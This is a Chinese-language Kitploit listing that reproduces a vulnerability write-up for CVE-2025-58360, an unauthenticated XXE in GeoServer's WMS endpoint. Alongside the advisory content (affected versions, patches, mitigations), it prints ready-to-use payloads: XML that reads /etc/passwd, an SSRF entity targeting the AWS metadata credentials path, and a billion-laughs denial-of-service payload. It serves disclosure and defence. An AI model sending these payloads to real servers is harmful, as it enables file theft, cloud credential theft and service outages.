Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
工具/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔓 🛰️ 'CVE-2025-58360' GeoServer WMS 端点易受 XXE 攻击 🌟

GeoServer

🏷️ 基本信息

  • CVE ID: CVE-2025-58360
  • 发布时间: 📅 2025年11月25日
  • 最后修改: 📅 2025年11月25日(截至11月26日仍为最新)
  • 漏洞类型: XML 外部实体 (XXE) – CWE-611
  • 受影响软件: GeoServer(用 Java 编写的开源地理空间服务器)
  • 严重性: 🔥 高 – CVSS v3.1 基础评分 7.5
    • 向量: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • 野外利用情况: 🟡 尚未观察到(2025年11月26日)– 但公开 PoC 正在传播
  • 是否需要认证: ❌ 无需 – 完全未认证
  • 是否需要用户交互: ❌ 无需

🎨 此漏洞的特殊之处(及危险性)

这是一个在 Web 地图服务 (WMS) GetMap 端点的经典但极具破坏性的 XXE。
攻击者可以:

  • 📂 读取 GeoServer 进程有权访问的任何文件(/etc/passwd、geoserver.xml、私钥等)
  • 🌐 执行服务器端请求伪造 (SSRF) 以扫描内部网络或访问元数据端点(例如 AWS/GCP)
  • 💣 通过实体扩展攻击(“十亿笑”)触发拒绝服务
  • 🔗 可能与其他漏洞链用实现完全远程代码执行(非直接,但在配置不当的环境中可能发生)

🛡️ 受影响版本(详细表格)

下载工具
组件受影响版本修复版本状态
GeoServer 独立版2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 易受攻击
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 易受攻击
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 易受攻击
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 易受攻击
GeoServer 2.27.x 及更高版本–已修补✅ 安全

🌍 全球暴露情况(截至2025年11月26日实时数据)

来源暴露实例数量备注
ZoomEye~49,400app:"GeoServer" 搜索
FOFA~24,000过去一年内的结果
Shodan~31,000端口 8080 + 标题匹配
GobySec~20,000公共网络扫描

→ 当前有数万台可能易受攻击的服务器暴露在公网上!🌐

🧨 完整技术利用演练

端点: POST /geoserver/wms
关键参数: SLD_BODY(允许原始 XML 样式)
易受攻击的代码路径: XML 解析器未禁用外部实体解析 → 经典 XXE。

f77f64d7c92fd31b29d537f5205da524

示例 1 – 文件泄露 (/etc/passwd)

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ 响应中包含 /etc/passwd 的内容 🎉

示例 2 – SSRF 到内部元数据(AWS 示例)

root@kitploit:~
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ 如果在 EC2 上运行,会泄露临时 AWS 凭证。

示例 3 – 十亿笑拒绝服务攻击

root@kitploit:~
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- 重复到 lol9 -->
]>
<lol>&lol9;</lol>

→ 几秒内消耗数 GB 内存 💥

🛠️ 官方补丁与下载

版本发布日期下载链接
2.27.02025年11月25日https://geoserver.org/release/stable/
2.26.32025年11月25日维护分支补丁
2.25.62025年11月25日旧版支持分支

Docker 用户:

root@kitploit:~
docker pull osgeo/geoserver:2.27.0

🔧 临时缓解措施(如无法立即打补丁)

  1. 使用 WAF/mod_security 规则阻止危险 XML:
    拒绝包含 <!ENTITY 或 SYSTEM "file:// 的请求
  2. 全局禁用 SLD_BODY 参数(如非必需)
  3. 以只读文件系统运行 GeoServer + 删除权限
  4. 放在反向代理后面,对未认证用户剥离 XML 主体

📢 官方参考及 PoC

  • NVD 条目: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • GeoServer 公告: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • JIRA 工单: https://osgeo-org.atlassian.net/browse/GEOS-11682
  • 公开安全 PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • Nuclei 模板(自动检测): 已合并到主分支

⏰ 时间线

日期事件
2025年11月前由 XBOW AI 扫描器自主发现
2025年11月25日协调披露 → 发布补丁
2025年11月25日CVE 分配并公开
2025年11月26日PoC 广泛传播,暴露扫描激增

✨ 结语

这是一个教科书级的 XXE,影响广泛部署的地理空间平台,存在数万台面向互联网的实例。
补丁与披露同日发布——感谢 GeoServer 团队的快速响应!🏆
但从补丁可用到大规模利用的窗口正在迅速缩小。

如果你运行 GeoServer → 立即升级。
不要成为下一个头条新闻。

保持安全,保持闪耀!🛡️✨